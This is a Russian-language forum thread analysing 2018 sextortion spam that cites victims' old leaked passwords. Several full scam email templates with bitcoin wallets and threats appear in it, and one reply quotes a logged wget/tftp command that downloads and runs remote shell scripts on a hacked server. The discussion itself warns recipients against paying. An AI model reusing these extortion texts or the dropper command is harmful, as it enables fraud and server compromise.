Лучше поздно, чем никогда, или как "школьники" зарабатывают на взломах сайтов, осуществлённых хакерами в период с 2009 по 2012 год

  • VirusHunter

Привет всем. Забавная история сейчас происходит. Кому-то на емэил могут приходить письма, отправленные якобы от Вас самих же, со следующими заголовками (возможные варианты):

account was hacked
или
Delete Message After Reading!
или
Security Warning
или
Your Account Was Hacked!

Текст письма один и тот же:

Hello!
I'm a member of an international hacker group.

As you could probably have guessed, your account
[Ваш адрес почтового ящика] was hacked, I sent message you from it.

Now I have access to you accounts! You still do not believe it?
So, this is your password:
[реальный пароль, который Вы используете] , right?

Within a period from July 5, 2018 to September 21, 2018, you were infected by the virus we've created, through an adult website you've visited.
So far, we have access to your messages, social media accounts, and messengers.
Moreover, we've gotten full damps of these data.

We are aware of your little and big secrets...yeah, you do have them. We saw and recorded your doings on porn websites. Your tastes are so weird, you know..

But the key thing is that sometimes we recorded you with your webcam, syncing the recordings with what you watched!
I think you are not interested show this video to your friends, relatives, and your intimate one...

Transfer $700 to our Bitcoin wallet: 1DzM9y4fRgWqpZZCsvf5Rx4HupbE5Q5r4y
I guarantee that after that, we'll erase all your "data" :D

A timer will start once you read this message. You have 48 hours to pay the above-mentioned amount.

Your data will be erased once the money are transferred.
If they are not, all your messages and videos recorded will be automatically sent to all your contacts found on your devices at the moment of infection.

You should always think about your security. We hope this case will teach you to keep secrets.
Take care of yourself.


Анализ кода писем показал, что на самом деле последние отсылались через разные сервера (многие присутствуют в коде писем в оригинальном виде и даже не зашифрованы/не подменены), при помощи какой-то разновидности программы типа "Аноним мэил" (или чего-то подобного), позволяющей в качестве адреса отправителя подставлять случайно сгенерированный адрес или, например, Ваш собственный.
В письме "хакеры" требуют заплатить криптовалютой выкуп за неразглашение Вашей переписки и персональной информации. Выкуп предлагается заплатить на указанный в тексте крипто-кошелёк в эквиваленте 700$. В принципе, не ново, правда лично меня сперва удивила одна деталь: откуда злоумышленникам известны мои пароли (по памяти помнил, что когда-то такие использовал, но не мог вспомнить где именно), причём сверка с базой моих актуальных паролей на сегодняшний день по разным сервисам и почтовым ящикам совпадений не нашла. Возник вопрос: откуда злоумышленникам известны не просто мои пароли, а пароли, которые я уже многие годы не использую? Для ответа на данный вопрос пришлось ждать, пока прибудут ещё письма от злоумышленников с ещё несколькими моими неактуальными паролями - чтобы можно было проанализировать для чего и где я их использовал в прошлом, дабы понять мотивы требований хакеров и что именно они взломали.
Итак, получив 3 древних своих пароля, попробовал сопоставить их с архивными данными 9-10-ти летней давности - и получил результат: все 3 пароля в прошлом использовались для входа в эккаунты ICQ и QIP Infium, примерно, до 2010 года. Тогда стало реально спешно: в период с 2009 под 2011 годы хакерами был взломан главный сервер QIP с последующей утечкой пользовательских данных - примерно, 33млн. пользователей QIP со смежными эккаунтами на ICQ. Получается следующая картина шантажа: хакеры, укравшие тогда базу данных пользователей - с контентом, логинами и паролями, выложили её где-то на закрытых ресурсах для всеобщего хакерского пользования; спустя 7-9 лет, этими данными решили воспользоваться "школьники", чтобы попытаться выжать из хозяев старых учётных записей деньги за неразглашение личных переписок, персональных фото и др. конфиденциальной информации. Речь же о взломе ящиков в каждом письме также не лишена правды, поскольку многие пользователи используют для доступа к соц. сетям и сервисам те же пароли, что и к почтовым ящикам, адреса которых используют в качестве логинов.
Но в моём случае хакеров ждало бы разочарование: во-первых, я никогда не использую те же пароли к сервисам и программам, что и к почтовым ящикам, адреса которых выступают в качестве логинов; во-вторых, покинув 8-9 лет назад сервисы QIP и ICQ, предварительно полностью удалил из базы данных этих серверов весь контент своих переписок, так что на должность жертвы я вряд ли подойду.
Теперь о злоумышленниках, рассылающих данные "письма счастья". Изучив характер пересылки и текст писем, могу утверждать следующее: злоумышленниками являются молодые люди - примерно 8-10 человек в возрасте до 25 лет. Все они пользуются готовыми инструментами для генерирования фальшивых писем, но не имеют ни малейшего представления о том, что источник отправки остаётся в коде писем в оригинальном виде - при желании можно было бы установить сперва провайдеров, а потом через них и IP-адреса злоумышленников, с которых они рассылали свои письма. Кроме того, профессиональный хакер никогда не станет расписывать своим жертвам как и для чего он их взломал.
Злоумышленники, очевиднее всего, не знают русского или украинского языка (о чём свидетельствует характер текста письма - некоторые фразы и обороты характерны только для стран Европы, Америки, возможно Китая, т.к. русско- или украинско-говорящие люди при написании текста на английском языке по-другому строят предложения, используя более простые фразы и распространённые слова).
Кроме того, злоумышленники пытаются взять потенциальную жертву на понт, описывая якобы присутствие в компьютере жертвы вируса, посредством которого и получили полный контроль над его компьютером и персональной информацией. К чему в письме упоминается дата 5 июля 2018 года - неизвестно, а вот 21 сентября 2018 года - вполне объяснима и оправдывает себя: в этот день в разных странах мира различные хакерские группировки провели ряд удачных атак на гос. учреждения, банки и онлайн-сервисы, похитив финансовые средства и парализовав работу взломанных серверов.
Что же касается якобы контроля над всеми устройствами компьютера - в частности, над веб-камерой, микрофоном и прочим, также является страшилкой для запугивания пользователя - дескать, хакеры предупреждают жертву, что они всё видят и всё слышат (забавно то, что у меня нет и никогда не было ни микрофона, ни веб-камеры - не фанат онлайнового общения с использованием голоса и видео трансляции).
В завершение хочу посоветовать пользователям, получившим аналогичные письма, никак не реагировать на данные выпады и никому, естественно, ничего не перечислять за молчание. Ваши данные по QIP и ICQ утекли в сеть 9 лет назад, так что спасать там уже нечего, да и сами сервисы утратили актуальность минимум лет 5 назад, т.к. на смену им пришло широкое использование более популярных - Skype, Viber и ряда других. Но если пароль к Вашему почтовому ящику и по сей день совпадает с когда-то используемым для входа в QIP и ICQ, то действительно стоит его сменить в кратчайшее время.
  • VirusHunter

Очевидно, не клюёт "рыбка" у школоты - сменили заголовок писем, текст, почему-то данные кошелька для перечисления криптовалюты и даже даты мнимого заражения вирусом компьютера потенциальной жертвы. Также "хакеры" вежливо просят прочитать свою жертву руководство в Гугле о том что такое криптовалюта биткоин и "как её правильно платить". :))

Тема письма: Account Issue

Новый текст писем:

Hello!
I'm a member of an international hacker group.

As you could probably have guessed, your account [Ваш адрес почтового ящика] was hacked, because I sent message you from it.

Now I have access to you accounts!
For example, your password for
[Ваш адрес почтового ящика] is [реальный пароль, который Вы используете]

Within a period from July 7, 2018 to September 23, 2018, you were infected by the virus we've created, through an adult website you've visited.
So far, we have access to your messages, social media accounts, and messengers.
Moreover, we've gotten full damps of these data.

We are aware of your little and big secrets...yeah, you do have them. We saw and recorded your doings on porn websites. Your tastes are so weird, you know..

But the key thing is that sometimes we recorded you with your webcam, syncing the recordings with what you watched!
I think you are not interested show this video to your friends, relatives, and your intimate one...

Transfer $700 to our Bitcoin wallet: 1Lughwk11SAsz54wZJ3bpGbNqGfVanMWzk
If you don't know about Bitcoin please input in Google "buy BTC". It's really easy.

I guarantee that after that, we'll erase all your "data" :D

A timer will start once you read this message. You have 48 hours to pay the above-mentioned amount.

Your data will be erased once the money are transferred.
If they are not, all your messages and videos recorded will be automatically sent to all your contacts found on your devices at the moment of infection.

You should always think about your security. We hope this case will teach you to keep secrets.
Take care of yourself.

  • VirusHunter

Продолжение попыток шантажа продолжается: школота изменила тему писем, текст (убрали даты внедрения мнимого вируса в систему жертвы, увеличили выкуп до 800$ и снова сменили кошелёк).

Тема писем:
Your Secret Life

Текст письма:

Hi, dear user of [домен почтового сервера, в котором расположен Ваш ящик]
We have installed one RAT software into you device.
For this moment your email account is hacked (see on , I messaged you from your account).
Your password for
[адрес Вашего ящика ]: [пароль к Вашему ящику]

I have downloaded all confidential information from your system and I got some more evidence.
The most interesting moment that I have discovered are videos records where you masturbating.

I posted my virus on porn site, and then you installed it on your operation system.
When you clicked the button Play on porn video, at that moment my trojan was downloaded to your device.
After installation, your front camera shoots video every time you masturbate, in addition, the software is synchronized with the video you choose.

For the moment, the software has collected all your contact information from social networks and email addresses.
If you need to erase all of your collected data, send me $800 in BTC (crypto currency).
This is my Bitcoin wallet: 1PuYAe7BLxNE6F6zE2PeVthfXCeYH88PmQ
You have 48 hours after reading this letter.

After your transaction I will erase all your data.
Otherwise, I will send video with your pranks to all your colleagues and friends!!!

And henceforth be more careful!
Please visit only secure sites!
Bye!

  • Grot666

Привет, ВирусХантер. Мне тоже пришло около 9 писем с прошлого вторника. Ввел номер одного из криптокошельков и попал на англоязычные форумы, где люди живо обсуждают эту тему. Так же по мимо вас, еще нашел.в твиттере русскоязычного Константина, которому тоже пришли подобные письма. Еще пару деталей. Мне пришел адрес старого сайта знакомств куда я очень давно не заходил. Вебкамеру я почти не использую и ноута с фронтальной камерой нет. Только телефон. Вчера написал в техподдержку моего почтового ящика. Ответили , что это спам и не стоит обращать внимание. Правда не ответили на вопрос касательно того, кому то еще приходили такие письма. Извиняюсь за ошибки. Пишу с телефона.
  • VirusHunter

День добрый. Письма "счастья" приходят, очевидно, всем, у кого QIP в 2009-2011 годах был зарегистрирован на существующий и по сей день почтовый ящик, который выполнял там роль логина для входа в учётную запись.
  • Grot666

Я не помню на этот ящик или нет была регисирация. Но факт в том, что этому мыло более 10 лет и я пользовался аськой и ее аналогами квип и прочее. 2. Интересно как долго еще будут приходить письма?И что если их не открывать, то меньше будет? Кажется нет, так как перед тем как я прочитал в Спаме уже было 6 писем за неделю 
  • VirusHunter

А шантажисты уверены, что смогут подзаработать на свалке переписок 7-9 летней давности))
Не думаю, что письма будут приходить слишком долго. Но, пока школоте надоест страдать ерундой, какое-то время всё же должно пройти.
  • Grot666

А по поводу записи с камер. В теории можно завладеть камерой телефона и следить за ним даже если экран выключен. Но тут понятно, что это делается в виде шпионажа за кем то одним. Ну или звездами какими то. Абсурд все записывать на видео.  У них же жертв не десятки, а тысячи. Так же можно и слить все данные кого то по контактам. Но когда столько людей, то это проблематично мне кажется. Я хоть и понимаю что это просто письма и ничего за ними нет на 99 процентов, но вот этот один процент возможности висит. Ссори, что с ошибками. Пишу с телефона
  • VirusHunter

Установить негласно бэкдор-троян, который будет следить за действиями пользователя, логировать информацию вводимую, например, с клавиатуры, позволять злоумышленникам следить через вэб-камеру за жертвой (по необходимости) - вполне реально. Но когда описание того, что типа заразили, постоянно варьируется, и когда злоумышленники мне пишут, что якобы мой собственный компьютера заразили (и чтобы я про это столько времени да не знал:)) - это, конечно, просто страшилка. И, как я уже писал выше, реальные хакеры никогда не будут описывать потенциальной жертве  когда и каким образом завладели её персональной информацией и как получают доступ к компьютеру.
  • Grot666

Добрый день). Еще прошлые 48 часов не прошли, а они опять написали 3 письма одного и того же содержания. У меня опять 48 часов). Что интересно, пишут как правило ночью. Американские школьники?) На данный момент имеет 12 писем. Содержание уже не новое, а повторяется. 
  • VirusHunter

День добрый. Мне тоже - с промежутком в полдня-день - приходят эти письма. Естественно, что текст немного варьируется, т.к. "школьников", примерно, с 8-10 человек (на это указывают IP-адреса серверов, через которые отсылаются письма - только один из вымогателей пытается маскировать реальный IP сервера своего провайдера, используя прокси). При этом количество писем резко сократилось: в первые 2 дня мне пришло более 15шт, а в последние дни - не более 3-4шт. Общий текст и темы писем не меняются вот уже 4-й день. Единственное, что изменилось в тексте - кошелёк для перечисления крипты.
  • Grot666

Да, кошелек другой. Будем смотреть на сколько их хватит.
  • Grot666

пересмотрел письма и обнаружил одну деталь. раза 2 или 3 в письме ошибка на одну цифру в пароле. это значит они в ручную заполняют? текст стандартный а пароли и логины они вписывают?
  • Grot666

При чем ни тот ни тот пасс не подходит, хотя указан в разделе Управления паролями. Логин взят с другого сайта. Вобщем странно все это. Как и откуда натырили. Если у вас взяли квип, асю, то буржуи пишут, что ники и логины с ласт фм, линкид и даже стим
  • VirusHunter

Пароли могли переносить через буфер обмена и, когда заметили, что последнюю цифру потеряли, вписали, на скорую руку, вручную, допустив ошибку (или так и отослали без последнего символа-цифры - вот пароль и не совпал). В присланных шантажистами письмах все устаревшие пароли к моим учёткам Квипа написаны без ошибок.
Взломы сетей Last.fm, LinkedIn и Steam с хищением учётных данных пользователей также имели место быть в 2011-2012 годах (лично я ни в одной из этих трёх зарегистрирован не был). Так что пользователям, возможно, приходят письма с упоминанием логинов и паролей не только от QIP и ICQ. Могу предположить, что взломанные базы с устаревшими данными реальные хакеры слили на всеобщее обозрение сетевой школоты, которая и решила попытать счастья, реализовав шантаж  пользователей через устрашающие письма.
  • Grot666

Не прошло двое суток, опять 3 письма. И опять в 1 ошибка пароля. Вроде поменяли кошелек и заголовок другой "account was hacked". Если знаете английский, можете посмотреть видос 
https://www.youtube.com/watch?v=in2FCVoJHXk

  • Grot666

Доступ к Системе знакомств с Вашего устройства временно заблокирован
Ваш IP: 

Ваш трекер: 
Доступ заблокирован по одной из причин:
с этого адреса ведется рассылка коммерческих предложений или спамас этого адреса кто-то рассылает хамские, оскорбительные или подозрительные сообщения или комментарии в дневникахпревышена естественная частота просмотров анкет или отправки сообщениймы подозреваем, что с этого адреса совершаются попытки взлома анкет
Хотел поменять пасс на сайте, который взломали. Отправил восстановление пароля. Зашел на сайти вот такое пишет. Это дело рук Хацкеров? Почему только заблокировано на моем устройстве , а не вообще аккаунт?
  • Grot666

Возможно потому, что я раз 10 вводил 3 логина и пароли к ним на сайте. Система заблочила.?
  • VirusHunter

Из видео следует, что пользователь таки заплатил выкуп шантажистам. Это он сделал очень и очень зря - во-первых, это будет стимулировать вымогателей продолжать заниматься тем же, во-вторых - нет никакой гарантии, что они не продолжат шантажировать жертву с удвоенной силой - у него есть деньги, он может и готов платить, так почему бы его не потрясти ещё пару-тройку раз... Именно на такую реакцию и расчитывают злоумышленники.
На счёт Вашего вопроса (подправил текст комментария, убрав лишнее подчёркивание) - не понял где и что Вам заблокировали, но если у Вас пароль от взломанной сети, или Квипа совпадал с актуальным паролем почтового ящика, адрес которого использовался там в качестве логина, то злоумышленники вполне могли получить доступ к письмам, среди которых могут быть и уведомления от служб поддержки разных сайтов с указанием Ваших логинов/паролей к различным онлайн-сервисам (так происходит при новой регистрации на сервисе - Вам пересылают по емэил логины и пароли, которые были указаны Вами при регистрации). Тогда Вы реально можете оказаться "взломанным" со всех сторон и уже не только Квип, почта и соц. сети станут доступными для просмотра и использования при шантаже злоумышленниками.
  • Grot666

Переводить деньги это еще и не разумно, потому что информация зашифрована и не понятно от кого пришли.2. Они якобы взломали меня нк сайте знакомств. Пароль совпадает, а логин нет. Я решил ввести адрес ящика на сайте, что бы прислали пароль. Мне прислали на почту. Я его ввел на сайте, но зайти не смог, так как заблочили. До этого я пытался вручную вводить раз 10. Может потому защита от взлома сработала. 
  • Grot666

Еще некоторым приходит письмо. У нас есть доказательства. Если хотите мы отправим 10 контактам. Смешно. Если у вас есть доки, то отправьте мне в личку
  • Grot666

Хотел вам в вайбер написать по личному вопросу. Но у вас он не зареген на этот номер. Не могу уже месяц или больше обновить базы на Нод 32,хотя пиратка до 20 года. Сколько будет стоить удаленная работа по защите компьютера? 
  • VirusHunter

Подозреваю, что Ваш эккаунт на сайте знакомств кто-то перерегистрировал на свой емэил (про пароль Вам написали, но предварительно заменили его новым). Где-то так.
Вайбера у меня нет - во-первых, использую уже почти что 15 лет старенькую Нокию (у меня нет потребностей в современных телефонах); во-вторых, Скайп, Вайбер и прочее на компьютер не ставлю себе принципиально - хватает общения через емэил, в личке на разных сайтах и по телефону с подопечными (опасаюсь за свой мозг - как-бы от Скайпа и Вайбера не лопнул от переобщения;))
НОД32 никогда не использовал и даже детально не тестировал, т.к. антивирусы: НОД32, Аваст, Битдефендер, Нортон и Мкафии у меня давно в чёрном списке - коряво работают, часто и много выдают ложных срабатываний и очень громоздкие в плане потребления системных ресурсов. Всегда был приверженцем Антивируса Касперского (очень хорошая вещь, если грамотно настроить, плюс с древних времён переписываюсь с ихними вирусными аналитиками - хорошие ребята).
По защите компьютера могу лишь помочь советом (на сегодняшний день я давно отошёл от глобальных софтовых вещей, занявшись компьютерным железом) - поставьте антивирус Касперского, настройте его под свои потребности, отключив всё лишнее - компьютер будет работать и шустро, и в безопасных условиях. Ни в коем случае не пользуйтесь встроенными в современные Виндовс-ситемы брэндмауэрами и антивирусами - кроме блокирования доступа самому же пользователю к реестру и файловой системе абсолютно ничего полезного они не делают, только мешают и создают иллюзию защиты.
  • Grot666

и зачем им мой аккаунт?там нет никакой информации кроме переписки
  • Grot666

И вроде пароль можно отправить только на тот который был зарегесирирован.  
  • VirusHunter

Логику школоты понять сложно, тем более, когда с момента взломов прошло от 6 до 9 лет - там уже добрая половина почтовых адресов давно не существует или покинута, да и переписки там явно ничего уникального не содержат (каждая вторая, если не первая - любовные похождения)) Разве что у тех, кто любит один и тот же пароль ставить на всё, и годами даже его не менять, могут возникнуть реальные проблемы с потерей эккаунтов на разных сайтах. Хотя, на мой взгляд, это совершенно дурное занятие - перелопачивать переписки десятков миллионов пользователей, пытаясь найти там иголку в стоге сена. Вероятность найти там актуальную секретную информацию, за которую кто-то что-то заплатит... Профессиональные  хакеры ломают эккаунты конкретных людей - у которых есть чем поживиться, или которые имеют реальные деньги для выкупа за реально конфиденциальную информацию, разглашение которой может повлечь крах целой компании, или авторитета большой личности. А так, требовать со всех подряд по 700-800$, не зная есть ли у человека причины вообще на это реагировать и финансы в частности, рассылая письма "счастья" на давно заброшенные или уже вообще несуществующие ящики... Даже не школа, это просто детский сад какой-то.
Кстати, я тут подумал: на видео, ссылку на которое Вы дали выше, с большой вероятностью не пострадавший пользователь, а кто-то из школоты-вымогателей, который поясняет пользователям как платить выкуп им на кошелёк - ну зачем обычному пользователю светить свои данные по кошельку, светить свой пароль (он не закрыт накладной подписью в тексте) - и вообще демонстративно показывать всем то, как он переводит деньги вымогателям? А школота вполне могла так ступить - они же уже засветили IP своих провайдеров в коде писем, так что запросто могли и проколоться на видео.
  • Grot666

Интересно. Не подумал.
  • Grot666

Обновил базы. Провел полное сканирование. 4 из 4 вирусов удалил. 3 вируса рекламных.  Slow pc-fighter. Один вирус на диске Д, а не С КВИП2010.ексе. Возможно это не вирус, просто распознает как потенциально нежелательное ПО? Нажал Очистить все. Очистилось.
  • VirusHunter

Да нет у Вас, как и у меня, никакого вируса, связанного с вымогателями - стал бы кто-то писать троян, ворующий пароли к программе, утратившей актуальность более 5-6 лет назад. Я вообще не знаю, на сегодняшний день, ни одного человека, который бы до сих пор пользовался Квипом или Аськой - это 2 давно умерших мамонта.))
  • Grot666

Я диск Д лет 10 не форматировал. Вот в разделе Программы всякое старье.2. Чисто для интереса все глубже погружаюсь в тему скам спама. География писем Эстония, Германия, Великобритания. Это куда именно пришли спам послания. До этого развода, были еще и другие похожие и в 2015 и 2017  году. Очень прибыльное дело. Например Выяснилось, что в адрес Биткойна скам "хакера" было сделано 20 платежей, три из которых составили не менее 1000 долларов США (или 785 фунтов стерлингов).

Конечно, эти выплаты не обязательно поступали от жертв, но они вполне могут быть.
  • Grot666

Опять письмо. Текст тот же. Кошелек другой 1PwENLsmQ2Z6b4EJfXDeeXKBj9v878uHRf
  • Grot666

Within a period from July 31, 2018 to October 3, 2018, you were infected by the virus we've created, through an adult website you've visited.

В некоторых письмах людям приходит с другой датой
--
Вот и мне сейчас пришло уже с другой датой от 31 по 3 октября
  • VirusHunter

Мне 2 дня ничего не приходило, а тут сразу 5 писем пришло. Текст и темы по варианту №2, только даты мнимого заражения действительно сменили на те, что Вы описывали, ну и номер кошелька снова другой.
  • Grot666

Мне вчера 5 писем, а сегодня 4 с одинаковым текстом. 2. Уже окло года приходят письма от ру трекера. Собирают пожертвования на сервер. На оф сайте написано что это развод, но при этом письма такие приходят.
  • VirusHunter

За трекер ничего сказать не могу, а тут - имеем то, что имеем. ;)
  • Grot666

Есть подозрение, что мой ящик попал в базу спамеров.Сегодня 2 сообщения
Can you imagine making HUNDREDS OF THOUSANDS every month?Yeah, THAT would change your life just a bit, right?
Raking in profits of $400K, $500K and more in a month, EVERY month would be EPIC!
The lucky few users of this new software are doing that and MORE!
Get started today!ссылку замазал


и


Want me? wanna fuck me? Ohhhh.... ok, come to me )) Here my foto and address, find me :)


картинка (гифка) и ссылка внизу.
  • Grot666

Кстати под тем видео на ютубе уже порядка 15 человек отписалось
  • Grot666

Так же нашел на одном британском сайте старые скам письма. Рассылка подобная, только с другим текстом ведется от февраля 

https://myonlinesecurity.co.uk/attempted-blackmail-scam-watching-porn/
  • Grot666

Мне пришло сегодня 3 сообщения. Текст тот же. новый номер кошелька 13cyEdT7kyH2f4j9xchvDGhv1o64MYNLUS Все три сообщения пришли в 11-04. Текст одинаковый. Но в одном пароль на одну цифру больше ( он не правильный)
  • VirusHunter

Думаю, смысла каждый раз писать комментарии с сообщениями кому и сколько ещё таких писем пришло - смысла нет, т.к. письма продолжают приходить постоянно, причём со всеми ранее описанными вариантами тем и текстов. Давайте будем дополнять данную тему, если действительно что-то глобально изменится или случится.
  • Grot666

Авторы спам-рассылок приняли на вооружение новую тактику вымогательства. Об этом сообщил ИБ-специалист под псевдонимом SecGuru. Чтобы придать достоверности письму с требованием выкупа, мошенники добавляют в его текст пароль жертвы. По мнению экспертов, злоумышленники покупают скомпрометированные учетные данные на специализированных форумах в дарквебе.
В руки ИБ-аналитика попал образец вредоносного письма, отправленного 12 июля. Его автор утверждает, что взломал компьютер жертвы и взял под контроль веб-камеру устройства. По словам мошенника, он обладает видеозаписью, на которой получатель просматривает порнографический контент. Киберпреступник требовал выкуп, угрожая разослать интимный ролик друзьям адресата.
В таких письмах не было бы ничего необычного, если бы киберпреступники не использовали конфиденциальные сведения, чтобы их угрозы звучали убедительнее. Для большей правдоподобности злоумышленники добавляли пароль от одного из аккаунтов жертвы в текст письма.
Изучив несколько образцов таких писем, специалисты пришли к выводу, что мошенники добавляют в текст настоящие, но уже устаревшие пароли. Во всех случаях идентификационные данные применялись жертвой для входа в аккаунт около десяти лет назад. По мнению экспертов, кибер-преступники воспользовались результатами предыдущих утечек или же приобрели сведения о скомпрометированных учетных записях на одном из криминальных форумов.
Аналитики подчеркивают, что мошенники не обладают никаким компрометирующим жертву контентом. Рассылка использует методы социальной инженерии, чтобы запугать получателя и заставить его заплатить выкуп. Эффективность такого спама очень невелика, но даже если 1% адресатов переведет злоумышленникам деньги, они получат прибыль.
По информации «Лаборатории Касперского», более половины мирового трафика электронной почты приходится на спам-рассылки. Злоумышленники используют в своих письмах актуальные инфоповоды, чтобы заинтересовать жертву. Так в первом квартале 2018 года среди тем фишинговых сообщений лидировали криптовалюты, блокировка Telegram и выборы президента России.
  • VirusHunter

Подкорректируйте, пожалуйста, ссылки источников информации, на которые Вы ссылаетесь в своём комментарии - такие страницы не существуют.
  • Grot666

Боюсь не получится. Я просто скопировал текст с одного сайта.2. Как сказал один чувак. Если бы у них были все пароли они бы банковские счета чистили, а не ждали когда им переведет один чувак из тысячи. Я на всякий случай сменил пароль от Приват 24, но понимаю что они не имеют доступ. Даже указав пароль в письме он не соответствует логину. Логин взят с другого сайта. 3.  И вообще как вы уже говорили в письме куча нестыковок. Почту не ломали, логин и пароль не во всех случаях совпадают, даты заражения меняются, у многих нет камер, но им приходит тот же шаблон что и остальным. Если бы у них были факты того, что тебя записывали, они бы выложили куда-то и дали ссылку. Так чаще всего делают шантажисты с теми кого записали по дурости . Схема. Девушка предлагает вирт, дает скайп, они общаются и нк только. Компромат готов. Чувак один писал, что ему на следующий день пришла ссылкк на закрытое видео в ютюбе. 
  • VirusHunter

Ну, это уже от ума человека зависит. Если он виртуальным сексом (или чем-то подобным) открыто занимается в онлайне с незнакомым партнёром - посредством видео трансляции, или высылает свои интимные фото (при этом ещё и с наличием своего лица) первому встречному - вероятность стать "звездой" Интернета очень высока.
P.S. Ошибки в Ваших последних двух комментариях исправил, ссылки на несуществующие страницы удалил. Смайлики вставлять в текст не нужно - они тут у нас не отображаются.
  • Grot666

Два дня ничего не приходло. Вот сейчас получил опять 2 письма.Кошелек 1F5csJmyf3yJs5s25tZmYKoFXznR452er9
  • Grot666

Within a period from July 30, 2018 to October 9, 2018
Они походу не соображают, что отправляли письма с 25 сентября. Уже пишут до 9 октября)
  • NN

Привет! Сегодня тоже получила письмо. Пароль был не верный. Спасибо, что подняли эту тему!
  • zazias

Письма получил аналогичные. Тоже старые пароли от аськи.

Но есть одно НО...
У меня сервер VDS, так вот письма эти не просто ЯКОБЫ от моего ящика отправлены, а точно с моего. В заголовках у отправителя фигурирует IP моего сервера.
Далее я заглянул на сервере в логи и увидел действительно отправку этих писем.

Так же в логах увидел выполнение команды
cd /tmp; wget http://209.250.234.19/bins.sh; chmod 777 *; sh bins.sh; tftp -g 209.250.234.19 -r tftp.sh; chmod 777 *; sh tftp.sh; rm -rf *.sh
Но пароль от сервера свежий, начал его использовать не так давно.
Получается, кто-то ломанул мой сервер и чтобы еще больше напугать меня, отправили именно с моего сервера.
Но вот как проникли на сервер я не могу догадаться.
  • VirusHunter

Уважаемый zazias, в заголовке писем Вы ощибочно приняли за сервер отправки сервер доставки писем. Они разные. С учётом того, что школота, рассылающая письма "счастья", не в курсе, что через сервер отправки можно вычислить, в конечном счёте, через какого провайдера работает злоумышленник, фальсификация исходного IP отправки писем, завуалированного под реальный почтовый сервер Вашего провайдера, исключена (к тому же, они его просто не могут заранее знать, а играться для уточнения этих данных точно не станут, поскольку на это нужно лишнее время + эти вещи они явно не знают, раз шлют всё в открытом виде).
P.S. Скиньте, пожалуйста, несколько образцов заголовков писем нам в "Контакты" - посмотрю, что там у Вас прописали сервера. Когда будете скидывать, просьба указать, что для Германа, а то коллеги сразу не поймут о чём речь и для чего заголовки писем переслали.
  • Grot666

Ни кто вас не ломанул. ваш емейл попал в сотни тысяч адресов на которые рассылается спам с подменой почтового адреса. Еще можете посмотреть, есть ли в отправленных эти письма. (если совсем параноя)
  • VirusHunter

Интересная вещь: в коде писем фигурируют IP провайдеров из, порядка, 20 стран, откуда приходят письма "счастья". Часть IP даёт основания полагать, что некоторые злоумышленники начали работать через "туннель", т.е. IP таки не оригинальный в плане провайдера Интернета злоумышленника. А вот самые частые - Вьетнам, Китай и Турция - тут картина другая: похоже на использование общественных сетей Wi-Fi (например, в кафе, или же просто не запароленных), поскольку IP отправки писем довольно таки сходные, т.е. злоумышленники отсылают их с одного города (или из близко расположенных один от другого городов), но с разных мест подключения, имеющих выход на одного и того же провайдера Интернета.
  • NN

Grot666 в отправленных - нет данного письма. айтишник сказал,что даже адрес, с которого отправлено письмо, уже не существует, есть только alias . не совсем понимаю, что это, расскажите, плиз, кто знает
  • VirusHunter

NN, Странно как-то Вам программист объяснил - "алиас" связан с программными вещами, причём тут адрес электронной почты - непонятно. Что не существует - тоже непонятно. Письмо приходит Вам якобы с Вашего же собственного адреса электронной почты (почему такая иллюзия имеет место быть - писал в самом начале темы). Поэтому как адреса Вашей электронной почты не существует, если Вы на него и получили письмо "счастья" - опять же непонятно. Что-то Ваш программист странные вещи говорит, или Вы что-то неправильно поняли в его объяснениях.
  • NN

Возможно из-за того, что он не программист, а сисадмин и чего-то не понимает
  • Grot666

Ясно одно. Переживать вам не стоит. Вы попали в спам рассылку как еще десятки, а то и сотни тыс человек. 
  • Dmitry

Добрый день. Сегодня ночью пришло подобное письмо (ниже).
Все бы ничего но письмо пришло от моего же аккаунта и на корпоративную почту (свой отдельный сервер). Почте года 3 всего.
Стоит ли опасаться и как быть?


Спасибо.


Hello d.kudrin@   My nickname in darknet is urbano05. I'll begin by saying that I hacked this mailbox (please look on 'from' in your header) more than six months ago, through it I infected your operating system with a virus (trojan) created by me and have been monitoring you for a long time.   Even if you changed the password after that - it does not matter, my virus intercepted all the caching data on your computer and automatically saved access for me.   I have access to all your accounts, social networks, email, browsing history. Accordingly, I have the data of all your contacts, files from your computer, photos and videos.   I was most struck by the intimate content sites that you occasionally visit. You have a very wild imagination, I tell you!   During your pastime and entertainment there, I took screenshot through the camera of your device, synchronizing with what you are watching. Oh my god! You are so funny and excited!   I think that you do not want all your contacts to get these files, right? If you are of the same opinion, then I think that $500 is quite a fair price to destroy the dirt I created.   Send the above amount on my bitcoin wallet: 1MN7A7QqQaAVoxV4zdjdrnEHXmjhzcQ4Bq As soon as the above amount is received, I guarantee that the data will be deleted, I do not need it.   Otherwise, these files and history of visiting sites will get all your contacts from your device. Also, I'll send to everyone your contact access to your email and access logs, I have carefully saved it!   Since reading this letter you have 48 hours! After your reading this message, I'll receive an automatic notification that you have seen the letter.   I hope I taught you a good lesson. Do not be so nonchalant, please visit only to proven resources, and don't enter your passwords anywhere! Good luck!
  • NN

Ребята поменяли текст! Мне тоже пришло только что данное письмо на корпоративную почту, которой примерно около 5 лет. Сейчас у меня время 9,25, а в письме указано, что время отправления 12,25. Из Китая???  Вчера мне стало известно, что в Италии, когда тысячи пользователей получили подобные письма, полиция сделала официальное заявление в прессе, что это мошенники. Что не следует поддаваться на их уловки.
  • VirusHunter

Уважаемый Dmitry, внимательно прочитайте, пожалуйста, самое начало темы, в котором я описывал почему в качестве отправителя указан Ваш собственный адрес, на который и пришло письмо от аферистов.
Если указанный в письме пароль отличен от актуального для текущего почтового ящика, то опасаться нечего. Если же они совпадают - поменяйте пароль к ящику на другой.
  • zazias

VirusHunter, пока я вам писал сообщение, вставлял заголовки письма, до меня дошло что случилось.
Мой email имел древний пароль, которые я уже сто лет не использую.
А мой сервер имеет панель ISP, через нее можно восстановить доступ через восстановление пароля. И как раз этот ящик у меня и был привязан как админский.
Я никак не мог понять, зачем мне сменили пароль на сервере. А оказалось его просто сбросили и ссылку с кодом восстановления получили как раз на этот ящик со старым паролем.


Так что я все выяснил, заголовки вам высылать нет смысла, так как и так по логам видно, что письма отправлены с сервера.


PS
А самое не приятное, что похоже, что они слили все с сервера. А там скрипты самописные, при детальном изучении естественно можно дыры найти.


  • NN

Dmitry, zazias, получается, что у вас данное сообщение присутствует в папке "Отправленные"?
  • VirusHunter

